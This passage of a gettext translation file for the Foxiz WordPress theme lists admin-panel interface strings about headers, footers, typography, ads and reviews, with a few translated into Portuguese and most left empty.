"Float Right" msgstr "" #: backend/panels/single-post.php:82 msgid "Floating Video" msgstr "" #: backend/panels/single-post.php:83 msgid "Floating video on the screen on scroll." msgstr "" #: templates/parts.php:802 msgid "Follow" msgstr "Seguir" #: backend/panels/bookmark.php:456 msgid "Follow categories that you're interested in" msgstr "" #: backend/panels/bookmark.php:477 msgid "Follow Page URL" msgstr "" #: templates/footer.php:212 templates/header/templates.php:621 msgid "Follow US" msgstr "Nos siga nas redes sociais" #: templates/blog.php:465 templates/entry.php:1171 msgid "Follow: " msgstr "" #: backend/panels/design.php:704 msgid "Font Awesome" msgstr "" #: backend/panels/typography.php:91 msgid "Font Size" msgstr "" #: backend/panels/footer.php:15 msgid "Footer" msgstr "" #: backend/panels/amp.php:360 msgid "Footer - Ad Type" msgstr "" #: backend/panels/amp.php:388 msgid "Footer - Adsense Size" msgstr "" #: backend/panels/amp.php:400 msgid "Footer - AMP Custom Ad Script" msgstr "" #: includes/sidebars.php:105 msgid "Footer - Column 1" msgstr "" #: includes/sidebars.php:114 msgid "Footer - Column 2" msgstr "" #: includes/sidebars.php:123 msgid "Footer - Column 3" msgstr "" #: includes/sidebars.php:133 msgid "Footer - Column 4" msgstr "" #: includes/sidebars.php:144 msgid "Footer - Column 5" msgstr "" #: backend/panels/amp.php:372 msgid "Footer - Data Ad Client" msgstr "" #: backend/panels/amp.php:380 msgid "Footer - Data Ad Slot" msgstr "" #: includes/sidebars.php:96 msgid "Footer - Top Full Width" msgstr "" #: backend/panels/amp.php:354 msgid "Footer Ad Settings" msgstr "" #: backend/panels/single-post.php:290 msgid "Footer Area" msgstr "" #: backend/panels/footer.php:30 msgid "Footer Background" msgstr "" #: backend/panels/footer.php:136 msgid "Footer Bottom Section" msgstr "" #: backend/panels/header.php:156 backend/panels/header.php:388 msgid "Footer Copyright" msgstr "" #: backend/panels/footer.php:144 msgid "Footer Logo" msgstr "" #: backend/panels/header.php:149 backend/panels/header.php:381 msgid "Footer Menu" msgstr "" #: backend/panels/ads.php:454 msgid "Footer Slide Up" msgstr "" #: backend/panels/ads.php:462 msgid "Footer Slide Up Section" msgstr "" #: backend/panels/footer.php:23 msgid "Footer Style" msgstr "" #: backend/single-metaboxes.php:172 backend/single-metaboxes.php:949 msgid "Footer Template Shortcode" msgstr "" #: backend/panels/newsletter.php:55 msgid "Footer Text" msgstr "" #: backend/panels/newsletter.php:62 msgid "Footer URL" msgstr "" #: backend/panels/heading.php:104 msgid "Footer Widget Heading Layout" msgstr "" #: backend/panels/footer.php:80 msgid "Footer Widget Section" msgstr "" #: backend/panels/footer.php:120 msgid "Footer Widgets - Template Shortcode" msgstr "" #: backend/panels/footer.php:90 msgid "Footer Widgets Layout" msgstr "" #: backend/single-metaboxes.php:490 msgid "Force Enable for This Post" msgstr "" #: backend/panels/optimized.php:90 msgid "Force write Dynamic CSS to file" msgstr "" #: backend/panels/header.php:565 msgid "Form Description" msgstr "" #: backend/panels/header.php:558 msgid "Form Heading" msgstr "" #: backend/panels/header.php:572 msgid "Form Logo" msgstr "" #: backend/category-settings.php:18 msgid "Foxiz - Individual Category Settings" msgstr "" #: backend/install-plugins.php:19 msgid "Foxiz Core" msgstr "" #: backend/theme-options.php:219 msgid "Foxiz Panel" msgstr "" #: backend/install-plugins.php:71 #, php-format msgid "Foxiz recommends the following plugin: %1$s." msgstr "" #: backend/install-plugins.php:70 #, php-format msgid "Foxiz the following plugin: %1$s." msgstr "" #: backend/panels/design.php:318 msgid "From The Center" msgstr "" #: backend/panels/design.php:317 msgid "From The Top" msgstr "" #: backend/panels/ads.php:420 backend/panels/page.php:46 #: backend/panels/single-post.php:174 backend/panels/single-post.php:186 #: backend/single-metaboxes.php:75 msgid "Full Width" msgstr "" #: backend/panels/table-contents.php:116 backend/single-metaboxes.php:729 msgid "Full Width (1 Column)" msgstr "" #: backend/panels/header-style.php:61 backend/panels/header-style.php:355 #: backend/panels/header-style.php:605 msgid "Full Width (100%)" msgstr "" #: backend/panels/table-contents.php:114 backend/single-metaboxes.php:727 msgid "Full Width (2 Columns)" msgstr "" #: backend/panels/typography.php:704 msgid "Full Width Headline" msgstr "" #: backend/panels/typography.php:761 msgid "Full Width Tagline" msgstr "" #: backend/panels/design.php:362 msgid "G1- 330x220" msgstr "" #: backend/panels/design.php:370 msgid "G2 - 420x280" msgstr "" #: backend/panels/design.php:378 msgid "G3 - 615x410" msgstr "" #: backend/single-metaboxes.php:418 msgid "Gallery Format" msgstr "" #: backend/panels/design.php:484 msgid "Gallery Icon" msgstr "" #: backend/panels/design.php:507 msgid "Gallery Icon Color" msgstr "" #: backend/panels/single-post.php:132 backend/single-metaboxes.php:424 msgid "Gallery Layout" msgstr "" #: backend/panels/single-post.php:126 msgid "Gallery Post Format Layout" msgstr "" #: backend/panels/amp.php:40 backend/panels/bookmark.php:28 #: backend/panels/general.php:10 backend/panels/header.php:31 #: backend/panels/single-post.php:1590 msgid "General" msgstr "" #: backend/panels/design.php:303 backend/panels/header-style.php:24 #: backend/panels/header-style.php:318 backend/panels/header-style.php:569 #: backend/panels/page.php:24 backend/single-metaboxes.php:51 msgid "General Settings" msgstr "" #: backend/panels/general.php:11 msgid "General settings for your website." msgstr "" #: backend/panels/design.php:647 msgid "GIF Supported" msgstr "" #: backend/category-settings.php:150 backend/panels/blog-pages.php:148 #: backend/panels/blog-pages.php:685 backend/panels/blog-pages.php:1101 #: backend/panels/blog-pages.php:1509 backend/panels/blog-pages.php:2002 msgid "Global Blog Template Builder" msgstr "" #: backend/panels/color.php:15 msgid "Global Colors" msgstr "" #: backend/panels/header.php:50 msgid "Global Header Style" msgstr "" #: backend/panels/header.php:59 msgid "Global Header Template Shortcode" msgstr "" #: backend/panels/heading.php:35 msgid "Global Heading" msgstr "" #: backend/panels/heading.php:40 msgid "Global Heading Layout" msgstr "" #: backend/panels/color.php:28 msgid "Global Highlight Color" msgstr "" #: backend/panels/general.php:34 msgid "Global Search Placeholder" msgstr "" #: backend/panels/breadcrumb.php:23 msgid "Global Setting" msgstr "" #: backend/panels/sidebar.php:26 msgid "Global Sidebar Position" msgstr "" #: backend/panels/header.php:40 msgid "Global Site Header" msgstr "" #: backend/category-settings.php:155 backend/panels/blog-pages.php:153 #: backend/panels/blog-pages.php:691 backend/panels/blog-pages.php:1106 #: backend/panels/blog-pages.php:1515 backend/panels/blog-pages.php:2007 msgid "Global WP Query Template Shortcode" msgstr "" #: templates/single/review-comment.php:91 msgid "Good" msgstr "" #: templates/single/reviews.php:175 msgid "Good Stuff" msgstr "" #: backend/panels/block-grid.php:27 backend/panels/block-grid.php:192 msgid "grid" msgstr "" #: backend/panels/single-post.php:1340 msgid "Grid 1 (3 Columns)" msgstr "" #: backend/category-settings.php:244 backend/configs.php:451 #: backend/panels/block-grid.php:17 msgid "Grid 1 (Standard)" msgstr "" #: backend/category-settings.php:245 backend/configs.php:455 #: backend/panels/block-grid.php:182 msgid "Grid 2" msgstr "" #: backend/panels/bookmark.php:54 msgid "Guest and Logged Users" msgstr "" #: backend/panels/bookmark.php:71 msgid "Guest Bookmark Expiration" msgstr "" #: backend/configs.php:237 msgid "H1" msgstr "" #: backend/panels/typography.php:129 msgid "H1 Font" msgstr "" #: backend/panels/typography.php:121 msgid "H1 Tag" msgstr "" #: backend/configs.php:238 backend/panels/single-post.php:532 #: backend/single-metaboxes.php:224 msgid "H2" msgstr "" #: backend/panels/typography.php:178 msgid "H2 Font" msgstr "" #: backend/panels/typography.php:170 msgid "H2 Tag" msgstr "" #: backend/configs.php:239 backend/panels/single-post.php:533 #: backend/single-metaboxes.php:225 msgid "H3" msgstr "" #: backend/panels/typography.php:227 msgid "H3 Font" msgstr "" #: backend/panels/typography.php:219 msgid "H3 Tag" msgstr "" #: backend/configs.php:240 backend/panels/single-post.php:534 #: backend/single-metaboxes.php:226 msgid "H4" msgstr "" #: backend/panels/typography.php:276 msgid "H4 Font" msgstr "" #: backend/panels/typography.php:268 msgid "H4 Tag" msgstr "" #: backend/configs.php:241 backend/panels/single-post.php:535 #: backend/single-metaboxes.php:227 msgid "H5" msgstr "" #: backend/panels/typography.php:325 msgid "H5 Font" msgstr "" #: backend/panels/typography.php:317 msgid "H5 Tag" msgstr "" #: backend/configs.php:242 backend/panels/single-post.php:536 #: backend/single-metaboxes.php:228 msgid "H6" msgstr "" #: backend/panels/typography.php:374 msgid "H6 Font" msgstr "" #: backend/panels/typography.php:366 msgid "H6 Tag" msgstr "" #: backend/configs.php:844 msgid "Half banner (234x60)" msgstr "" #: backend/configs.php:854 msgid "Half Page (300x600)" msgstr "" #: backend/panels/table-contents.php:115 backend/single-metaboxes.php:728 msgid "Half Width" msgstr "" #: backend/panels/reaction.php:44 msgid "Happy" msgstr "" #: templates/header/templates.php:615 msgid "Have an existing account?" msgstr "Já tem uma conta?" #: backend/panels/header.php:16 msgid "Header" msgstr "" #: backend/panels/amp.php:300 msgid "Header - Ad Type" msgstr "" #: backend/panels/amp.php:328 msgid "Header - Adsense Size" msgstr "" #: backend/panels/amp.php:340 msgid "Header - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:312 msgid "Header - Data Ad Client" msgstr "" #: backend/panels/amp.php:320 msgid "Header - Data Ad Slot" msgstr "" #: backend/panels/amp.php:294 msgid "Header Ad Settings" msgstr "" #: includes/sidebars.php:79 msgid "Header Advertising" msgstr "" #: backend/single-metaboxes.php:153 backend/single-metaboxes.php:930 msgid "Header Alert Bar" msgstr "" #: backend/panels/blog-pages.php:1968 backend/panels/header.php:408 #: backend/panels/header.php:462 msgid "Header Background" msgstr "" #: backend/category-settings.php:92 backend/panels/blog-pages.php:90 #: backend/panels/blog-pages.php:1084 backend/panels/blog-pages.php:1492 msgid "Header Background Style" msgstr "" #: backend/panels/header-style.php:80 msgid "Header Height" msgstr "" #: backend/panels/blog-pages.php:2390 msgid "Header Image" msgstr "" #: backend/panels/typography.php:893 msgid "Header Menus" msgstr "" #: backend/panels/header.php:738 msgid "Header Mini Cart" msgstr "" #: backend/panels/header.php:173 msgid "Header Search" msgstr "" #: backend/panels/header.php:195 msgid "Header Search Icon" msgstr "" #: backend/category-settings.php:56 backend/panels/blog-pages.php:37 #: backend/panels/blog-pages.php:603 backend/panels/blog-pages.php:1921 #: backend/panels/single-post.php:1555 backend/single-metaboxes.php:890 msgid "Header Style" msgstr "" #: backend/panels/header-style.php:15 msgid "Header Style 1,2,3" msgstr "" #: backend/panels/header-style.php:309 msgid "Header Style 4" msgstr "" #: backend/panels/header-style.php:560 msgid "Header Style 5" msgstr "" #: backend/category-settings.php:64 backend/panels/blog-pages.php:60 #: backend/panels/blog-pages.php:626 backend/panels/blog-pages.php:1944 #: backend/panels/woocommerce.php:60 backend/single-metaboxes.php:121 #: backend/single-metaboxes.php:898 msgid "Header Template Shortcode" msgstr "" #: backend/panels/header-style.php:56 backend/panels/header-style.php:350 #: backend/panels/header-style.php:601 msgid "Header Width" msgstr "" #: backend/category-settings.php:182 backend/panels/blog-pages.php:204 #: backend/panels/blog-pages.php:2404 msgid "Heading" msgstr "" #: backend/panels/bookmark.php:133 backend/panels/bookmark.php:483 msgid "Heading background Style" msgstr "" #: backend/panels/heading.php:129 msgid "Heading Color" msgstr "" #: backend/panels/heading.php:15 msgid "Heading Design" msgstr "" #: backend/panels/typography.php:1038 msgid "Heading Font" msgstr "" #: backend/category-settings.php:205 backend/panels/blog-pages.php:227 #: backend/panels/bookmark.php:540 backend/panels/single-post.php:1327 msgid "Heading Font Size (Desktop)" msgstr "" #: backend/category-settings.php:197 backend/panels/blog-pages.php:219 #: backend/panels/bookmark.php:532 backend/panels/single-post.php:1319 msgid "Heading HTML Tag" msgstr "" #: backend/category-settings.php:189 backend/panels/blog-pages.php:211 #: backend/panels/bookmark.php:524 backend/panels/single-post.php:1311 msgid "Heading Layout" msgstr "" #: backend/panels/table-contents.php:50 msgid "Heading Tag Supported" msgstr "" #: backend/panels/typography.php:1039 msgid "" "Heading tag will use default H tag font settings. Select font values if you " "would like to choose a custom font." msgstr "" #: backend/single-metaboxes.php:750 msgid "Headings Table" msgstr "" #: templates/header/templates.php:289 msgid "Hi," msgstr "Olá," #: backend/panels/single-post.php:1442 msgid "" "Hide a part of content of next posts and show the button to increase page " "views." msgstr "" #: backend/panels/single-post.php:402 msgid "Hide Next/Prev Post pagination on the mobile device." msgstr "" #: backend/configs.php:861 msgid "Hide on Desktop" msgstr "" #: backend/panels/single-post.php:1465 msgid "Hide Sidebar on Mobile" msgstr "" #: backend/category-settings.php:466 backend/panels/block-classic.php:130 #: backend/panels/block-grid.php:130 backend/panels/block-grid.php:295 #: backend/panels/block-grid.php:460 backend/panels/block-grid.php:633 #: backend/panels/block-grid.php:820 backend/panels/block-list.php:138 #: backend/panels/block-list.php:311 backend/panels/block-list.php:492 #: backend/panels/block-list.php:687 backend/panels/blog-pages.php:491 #: backend/panels/blog-pages.php:978 backend/panels/blog-pages.php:1392 #: backend/panels/blog-pages.php:1800 backend/panels/blog-pages.php:2292 #: backend/panels/bookmark.php:390 backend/panels/bookmark.php:838 msgid "Hide the entry category on the tablet and mobile devices." msgstr "" #: backend/category-settings.php:496 backend/panels/block-classic.php:156 #: backend/panels/block-grid.php:156 backend/panels/block-grid.php:321 #: backend/panels/block-grid.php:486 backend/panels/block-grid.php:659 #: backend/panels/block-grid.php:846 backend/panels/block-list.php:164 #: backend/panels/block-list.php:337 backend/panels/block-list.php:518 #: backend/panels/block-list.php:713 backend/panels/blog-pages.php:521 #: backend/panels/blog-pages.php:1008 backend/panels/blog-pages.php:1422 #: backend/panels/blog-pages.php:1830 backend/panels/blog-pages.php:2322 #: backend/panels/bookmark.php:412 backend/panels/bookmark.php:868 msgid "Hide the post excerpt on the tablet and mobile devices." msgstr "" #: backend/panels/single-post.php:1466 msgid "Hide the post sidebar on the mobile device when load next posts." msgstr "" #: backend/panels/header.php:712 msgid "Hide this bar on the sticky navigation." msgstr "" #: backend/panels/header.php:711 msgid "Hide when Sticky" msgstr "" #: backend/mega-menu.php:142 msgid "Hierarchical" msgstr "" #: backend/category-settings.php:30 backend/panels/design.php:44 msgid "Highlight Color" msgstr "" #: backend/panels/color.php:23 msgid "Highlight Colors" msgstr "" #: backend/panels/single-post.php:544 msgid "Highlight Heading" msgstr "" #: backend/single-metaboxes.php:212 msgid "Highlight Point" msgstr "" #: backend/panels/single-post.php:1490 backend/panels/single-post.php:1499 msgid "Highlight Shares" msgstr "" #: backend/panels/single-post.php:546 msgid "Highlights" msgstr "" #: backend/panels/optimized.php:181 msgid "Home Description" msgstr "" #: backend/panels/header-style.php:140 backend/panels/header-style.php:218 #: backend/panels/header-style.php:284 backend/panels/header-style.php:428 #: backend/panels/header-style.php:507 backend/panels/header-style.php:695 #: backend/panels/header-style.php:773 msgid "Hover Accent Color" msgstr "" #: backend/panels/design.php:567 msgid "Hover Effects" msgstr "" #: backend/panels/header-style.php:132 backend/panels/header-style.php:210 #: backend/panels/header-style.php:276 backend/panels/header-style.php:420 #: backend/panels/header-style.php:499 backend/panels/header-style.php:687 #: backend/panels/header-style.php:765 msgid "Hover Text Color" msgstr "" #: backend/panels/single-post.php:529 msgid "HTML Tag" msgstr "" #: backend/panels/design.php:180 msgid "Human Time Format" msgstr "" #: backend/panels/single-post.php:218 msgid "Hyperlink Color" msgstr "" #: backend/panels/single-post.php:200 msgid "Hyperlink Settings" msgstr "" #: backend/panels/single-post.php:205 msgid "Hyperlink Style" msgstr "" #: backend/panels/single-post.php:234 msgid "Hyperlink Underline" msgstr "" #: backend/panels/header.php:550 msgid "Icon" msgstr "" #: backend/mega-menu.php:238 msgid "Icon Classname" msgstr "" #: backend/panels/ads.php:39 msgid "" "If you use auto ads code, you need to disable any other adsense units code." msgstr "" #: backend/panels/design.php:246 msgid "" "If you use font Awesome. ensure that the setting in \"Theme Design > Font " "Awesome\" is enabled." msgstr "" #: backend/single-metaboxes.php:344 backend/single-metaboxes.php:392 msgid "Iframe Embed Code" msgstr "" #: backend/panels/dark-mode.php:35 msgid "Image Opacity" msgstr "" #: backend/panels/typography.php:488 msgid "Important Meta Font" msgstr "" #: backend/panels/header-style.php:89 backend/panels/header-style.php:377 #: backend/panels/header-style.php:644 msgid "" "In case you would like to switch layout and text to light when set a dark " "background for sub menu in light mode." msgstr "" #: backend/panels/single-post.php:1374 msgid "Infinite Scroll" msgstr "" #: backend/configs.php:563 backend/panels/bookmark.php:575 msgid "Infinite Scroll (Ajax)" msgstr "" #: backend/panels/amp.php:541 msgid "Inline - Ad Type" msgstr "" #: backend/panels/amp.php:569 msgid "Inline - Adsense Size" msgstr "" #: backend/panels/amp.php:581 msgid "Inline - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:553 msgid "Inline - Data Ad Client" msgstr "" #: backend/panels/amp.php:561 msgid "Inline - Data Ad Slot" msgstr "" #: backend/panels/single-post.php:1259 msgid "Inline Content Related Box" msgstr "" #: backend/panels/ads.php:265 msgid "Inline Single Content" msgstr "" #: backend/panels/amp.php:535 msgid "Inline Single Content Ad Settings" msgstr "" #: backend/panels/typography.php:593 msgid "Input & Textarea Font" msgstr "" #: backend/panels/blog-pages.php:154 backend/panels/blog-pages.php:1107 #: backend/panels/blog-pages.php:1516 backend/panels/blog-pages.php:2008 msgid "" "Input a \"Ruby Template\" shortcode to display as the main blog posts, ie: " "[Ruby_E_Template id=\"1\"]." msgstr "" #: backend/panels/blog-pages.php:120 msgid "" "Input a \"Ruby Template\" shortcode to embed it after the category header, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/category-settings.php:130 msgid "" "Input a \"Ruby Template\" shortcode to embed it after this category header, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:659 msgid "" "Input a \"Ruby Template\" shortcode to embed it the bottom of the blog page, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:650 msgid "" "Input a \"Ruby Template\" shortcode to embed it the top of the blog page, ie:" " [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/category-settings.php:156 msgid "" "Input a \"Ruby Template\" shortcode to show it as a the main blog listing " "for this category." msgstr "" #: backend/panels/blog-pages.php:692 msgid "" "Input a \"Ruby Template\" shortcode to show it as a the main blog listing." msgstr "" #: backend/panels/design.php:330 msgid "Input a custom crop size: width x height. For example: 300x200" msgstr "" #: backend/panels/single-post.php:498 msgid "Input a custom font size value (in px) for the single entry category." msgstr "" #: backend/panels/blog-pages.php:228 msgid "" "Input a custom font size value for the category heading (px) on the desktop." msgstr "" #: backend/category-settings.php:206 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave " "this option blank to set the default value." msgstr "" #: backend/panels/bookmark.php:541 backend/panels/single-post.php:1328 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave " "this option blank to set the default." msgstr "" #: backend/panels/header.php:603 msgid "Input a custom forget password URL if have." msgstr "" #: backend/panels/single-post.php:1754 msgid "" "Input a custom height value (px) for this bar. Leave blank to set it as the " "default." msgstr "" #: backend/panels/header.php:354 msgid "Input a custom height value for the mobile navigation, Default is 40px." msgstr "" #: backend/panels/header.php:596 msgid "Input a custom register URL if have." msgstr "" #: backend/panels/design.php:686 msgid "Input a custom round corner (in px) for your website." msgstr "" #: backend/panels/design.php:436 msgid "" "Input a custom time value to next a slide in milliseconds (default is 5000)." msgstr "" #: backend/panels/ads.php:495 msgid "" "Input a delay time (ms) value to show the slide up after the site loaded." msgstr "" #: backend/panels/adblock.php:34 msgid "Input a description for the adblock popup." msgstr "" #: backend/panels/ads.php:410 msgid "Input a description for the adverting box." msgstr "" #: backend/panels/header.php:566 msgid "" "Input a description for the login form. Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:278 msgid "Input a destination URL for the notification panel." msgstr "" #: backend/panels/footer.php:208 msgid "Input a font size value (in px) for the copy right text." msgstr "" #: backend/panels/footer.php:114 msgid "" "Input a font size value (in px) for the default menu widgets are displaying " "in the footer." msgstr "" #: backend/panels/footer.php:214 msgid "Input a font size value (in px) for the footer copyright menu." msgstr "" #: backend/panels/newsletter.php:56 msgid "Input a footer text for the box." msgstr "" #: backend/panels/header.php:188 msgid "Input a heading for displaying above the search form." msgstr "" #: backend/panels/blog-pages.php:2405 msgid "" "Input a heading for the 404 page. Leave this option blank to set it as the " "default." msgstr "" #: backend/panels/single-post.php:545 msgid "Input a heading for the highlights section if it is existing." msgstr "" #: backend/panels/header.php:559 msgid "Input a heading for the login form." msgstr "" #: backend/panels/blog-pages.php:205 msgid "" "Input a heading for the post listing. Leave blank to disable this section" msgstr "" #: backend/category-settings.php:183 msgid "" "Input a heading for the post listing. Leave this option blank to set the " "default." msgstr "" #: backend/panels/bookmark.php:105 backend/panels/bookmark.php:448 #: backend/panels/bookmark.php:519 msgid "Input a heading for this section." msgstr "" #: backend/panels/single-post.php:1305 msgid "Input a heading for this section. Leave -1 to disable this heading." msgstr "" #: backend/panels/amp.php:98 backend/panels/footer.php:159 msgid "Input a height for value for the footer logo, Default is 50px." msgstr "" #: backend/panels/header-style.php:369 backend/panels/header-style.php:636 msgid "Input a max height value for the logo of this header. Default is 60." msgstr "" #: backend/panels/ads.php:201 backend/panels/ads.php:390 msgid "" "Input a max width value (in px) for your ad image, leave blank set full size." msgstr "" #: backend/panels/single-post.php:1133 msgid "Input a meta text for the sponsored posts." msgstr "" #: backend/panels/table-contents.php:126 msgid "" "Input a minimum value for total heading tags to show the table of contents " "box." msgstr "" #: backend/panels/newsletter.php:49 msgid "Input a newsletter shortcode." msgstr "" #: backend/single-metaboxes.php:581 msgid "Input a offer label (Call to action) for this product review." msgstr "" #: backend/panels/single-post.php:1276 msgid "Input a position (after x paragraphs) to display the related bõ." msgstr "" #: backend/panels/table-contents.php:142 msgid "" "Input a position (after x paragraphs) to display the table of contents box." msgstr "" #: backend/single-metaboxes.php:737 msgid "" "Input a position (after x paragraphs) to display the table of contents box. " "Leave blank to use the theme option setting, Set \"-1\" for displaying at " "the top." msgstr "" #: backend/panels/ads.php:429 backend/panels/amp.php:589 msgid "Input a position (after x paragraphs) to display your ads." msgstr "" #: backend/panels/header.php:589 msgid "Input a redirect URL when the user logged in." msgstr "" #: backend/panels/single-post.php:1267 msgid "Input a related shortcode you want to display." msgstr "" #: backend/single-metaboxes.php:173 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for " "this page, Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:950 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for " "this post, Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/panels/blog-pages.php:627 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "blog page." msgstr "" #: backend/panels/blog-pages.php:61 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "category pages." msgstr "" #: backend/panels/blog-pages.php:1945 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "search page." msgstr "" #: backend/category-settings.php:65 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this category. Leave blank to use the above setting." msgstr "" #: backend/single-metaboxes.php:122 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this page. Leave this option blank to set as the above setting." msgstr "" #: backend/single-metaboxes.php:899 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this page. This setting requests to select \"Use Ruby Template\" in site " "header setting in order to work." msgstr "" #: backend/panels/header.php:60 msgid "Input a Ruby Template shortcode for displaying as the website header." msgstr "" #: backend/single-metaboxes.php:541 msgid "" "Input a short description to display before the review score, For example: " "Good, Bad..." msgstr "" #: backend/single-metaboxes.php:668 msgid "" "Input a starting view value for this post. Leave blank if you want to " "display real data." msgstr "" #: backend/single-metaboxes.php:199 msgid "" "Input a tagline for this post, It will display under the single post title." msgstr "" #: backend/panels/ads.php:470 msgid "" "Input a template shortcode or any other shortcode you would like to show in " "this section." msgstr "" #: backend/panels/adblock.php:27 msgid "Input a title for the adblock popup." msgstr "" #: backend/panels/reaction.php:32 msgid "" "Input a title for the reaction section. Leave blank to set it as the default." msgstr "" #: backend/single-metaboxes.php:497 msgid "Input a title for this review section." msgstr "" #: backend/panels/design.php:69 msgid "" "Input a value to limited numbers of entry category show on all post listing " "layout, useful in case you have many categories per post." msgstr "" #: backend/mega-menu.php:205 msgid "" "Input a width value (in px) for this mega section. Leave blank or 0 to set " "to full width." msgstr "" #: backend/panels/header.php:142 msgid "" "Input a width value (in px) for this section. Leave blank to set a the " "default." msgstr "" #: backend/single-metaboxes.php:547 msgid "Input advantages for this review." msgstr "" #: backend/mega-menu.php:243 msgid "Input attachment image/SVG url to show your icon." msgstr "" #: backend/single-metaboxes.php:259 msgid "Input attribution for the featured image." msgstr "" #: backend/single-metaboxes.php:252 msgid "Input caption text for the featured image." msgstr "" #: backend/panels/header-style.php:629 msgid "" "Input custom height value (px) for the navigation bar of this header. " "Default is 40px." msgstr "" #: backend/panels/header-style.php:362 msgid "Input custom height value (px) for the navigation bar. Default is 40." msgstr "" #: backend/panels/header-style.php:81 msgid "Input custom height value (px) for this header. Default is 60." msgstr "" #: backend/category-settings.php:337 backend/panels/blog-pages.php:359 #: backend/panels/blog-pages.php:846 backend/panels/blog-pages.php:1260 #: backend/panels/blog-pages.php:1668 backend/panels/blog-pages.php:2160 #: backend/panels/bookmark.php:259 backend/panels/bookmark.php:707 msgid "" "Input custom ratio percent (height*100/width) for featured image you would " "like. For example: 50" msgstr "" #: backend/panels/general.php:35 msgid "" "Input default placeholder text for the search form, leave blank to set it as " "the default." msgstr "" #: backend/panels/newsletter.php:42 msgid "Input description for the popup newsletter form" msgstr "" #: backend/panels/bookmark.php:112 backend/panels/bookmark.php:455 msgid "Input description for this section." msgstr "" #: backend/single-metaboxes.php:561 msgid "Input disadvantages for this review." msgstr "" #: backend/category-settings.php:488 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/panels/blog-pages.php:513 backend/panels/blog-pages.php:1000 #: backend/panels/blog-pages.php:1414 backend/panels/blog-pages.php:1822 #: backend/panels/blog-pages.php:2314 backend/panels/bookmark.php:860 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/category-settings.php:480 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/panels/blog-pages.php:505 backend/panels/blog-pages.php:992 #: backend/panels/blog-pages.php:1406 backend/panels/blog-pages.php:1814 #: backend/panels/blog-pages.php:2306 backend/panels/bookmark.php:852 #: backend/panels/single-post.php:609 backend/panels/single-post.php:618 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/category-settings.php:359 msgid "" "Input entry meta tags to show. Separated by commas (for example: author,date)" ". All meta keys include: [author, date, category, tag, view, comment, update," " read, custom]" msgstr "" #: backend/single-metaboxes.php:575 msgid "Input final summary for this review." msgstr "" #: backend/panels/typography.php:587 msgid "Input Font Settings" msgstr "" #: backend/single-metaboxes.php:757 msgid "Input Heading" msgstr "" #: backend/single-metaboxes.php:206 msgid "" "Input highlights for this post. This section will appear a the top of " "content. To edit this section heading, Navigate to Theme Options > Single " "Post > Tagline & highlights" msgstr "" #: backend/single-metaboxes.php:393 msgid "Input iframe embed code if WordPress cannot support your audio URL." msgstr "" #: backend/single-metaboxes.php:345 msgid "Input iframe embed code if WordPress cannot support your video URL." msgstr "" #: backend/panels/bookmark.php:72 msgid "" "Input max expiration (days) to save bookmarks for the guest users. Set 0 for " "no expiration." msgstr "" #: backend/panels/design.php:166 msgid "" "Input number of words per minute to calculate the reading time. Default is " "130" msgstr "" #: backend/single-metaboxes.php:599 msgid "Input the currency of the price." msgstr "" #: backend/panels/amp.php:313 backend/panels/amp.php:373 #: backend/panels/amp.php:433 backend/panels/amp.php:494 #: backend/panels/amp.php:554 msgid "Input the data-ad-client number ID (without ca-pub-)." msgstr "" #: backend/panels/amp.php:321 backend/panels/amp.php:381 #: backend/panels/amp.php:441 backend/panels/amp.php:502 #: backend/panels/amp.php:562 msgid "Input the data-ad-slot number ID." msgstr "" #: backend/single-metaboxes.php:587 msgid "Input the destination URL of the offer." msgstr "" #: backend/panels/bookmark.php:478 msgid "Input the follow page URL for user can redirect to add their interests." msgstr "" #: backend/panels/header.php:157 backend/panels/header.php:389 msgid "" "Input the footer copyright text to display at the bottom of this section, " "allow raw HTML." msgstr "" #: backend/single-metaboxes.php:751 msgid "" "Input the heading for each page corresponding to the page break tags. Please " "input all headings for pages to show the section." msgstr "" #: backend/panels/table-contents.php:133 msgid "Input the heading for the table of contents box." msgstr "" #: backend/panels/design.php:238 msgid "Input the label for this meta." msgstr "" #: backend/panels/socials.php:190 backend/panels/socials.php:217 #: backend/panels/socials.php:244 msgid "Input the name of font icon, for example: \"fab fa-facebook\"." msgstr "" #: backend/panels/socials.php:184 backend/panels/socials.php:211 #: backend/panels/socials.php:238 msgid "Input the name of the social, for example: facebook, twitter." msgstr "" #: backend/single-metaboxes.php:772 msgid "" "Input the post source if it has, it will display at the bottom of post " "content" msgstr "" #: backend/single-metaboxes.php:793 msgid "" "Input the post via if it has, it will display at the bottom of post content" msgstr "" #: backend/single-metaboxes.php:593 msgid "Input the price of the offer." msgstr "" #: backend/panels/design.php:544 msgid "" "Input the read more label to display on your website. Default is \"Read " "More\"." 